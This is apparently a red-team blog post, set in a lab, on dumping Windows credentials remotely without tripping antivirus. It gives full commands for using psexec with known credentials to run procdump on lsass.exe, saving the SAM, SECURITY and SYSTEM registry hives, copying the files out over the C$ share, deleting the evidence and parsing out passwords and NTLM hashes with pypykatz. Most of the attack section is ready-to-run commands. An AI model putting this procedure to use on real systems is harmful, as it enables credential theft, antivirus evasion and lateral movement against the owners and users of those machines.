Evading Antivirus When Dumping Passwords Remotely
During Red Team engagements, I frequently gain RCE (remote code execution) on a host by using credentials which I gained from a previous attack. This RCE could come in the form of psexec, SQL commands or even a full Remote Desktop session. One of my first objectives at this point is to determine if endpoint security (antivirus) software is installed on the remote victim. If it is not, I'll typically run mimikatz.
If endpoint security software is installed, it's generally still a trivial task to harvest credentials by dumping lsass.exe and the SAM. This sort of dump is often not blocked by antivirus (I tested multiple). My post focuses on how to perform the dumps with psexec and how to parse the output with pypykatz. I will demonstrate this in a lab environment, using psexec to authenticate to the victim to dump remotely.
Test environment
This attack could be done with only one attack machine, but I used two attack VMs:
1. Windows 10 - Uses psexec to perform the dumps remotely
2. Kali Linux 2020.3 - Runs pypykatz to parse the files for credentials
The victim VM was running Windows 10.
The Attack
After downloading procdump and psexec on the Windows attack box, I performed the remote lsass.exe dump against the remote victim:
psexec \\192.168.0.100 -u testuser -p password123 -e -h -s -c procdump -accepteula -ma lsass.exe c:\lsass.dmp
Note that by using the -c option, I copied procdump to the remote victim to make things simpler. We now have enough to get credentials in RAM, but I want to get the SAM as well:
psexec \\192.168.0.100 -u testuser -p password123 -e -h -s cmd /c reg save hklm\system c:\sys.hiv ^& reg save hklm\security c:\sec.hiv ^& reg save hklm\sam c:\sam.hiv
Notice the ^ to escape the &. Now it's time to download the l00t:
net use x: /user:testuser \\192.168.0.100\c$ password123
copy x:\lsass.dmp
copy x:\*.hiv
del x:\lsass.dmp x:\sam.hiv x:\sec.hiv x:\sys.hiv
This completes the active portion of the attack, and the rest involves parsing the resulting files.
Parsing
Next, I used pypykatz to parse the files:
5. pypykatz lsa minidump lsass.dmp
6. pypykatz registry --sam sam.hiv --security sec.hiv sys.hiv
Depending on various factors, you may end up harvesting cleartext passwords (as shown in the first screenshot above), or NTLM password hashes.
If you prefer to use mimikatz for this parsing, the commands can be found here: https://www.vanimpe.eu/2019/03/07/mimikatz-and-hashcat-in-practice/
Comments
Post a Comment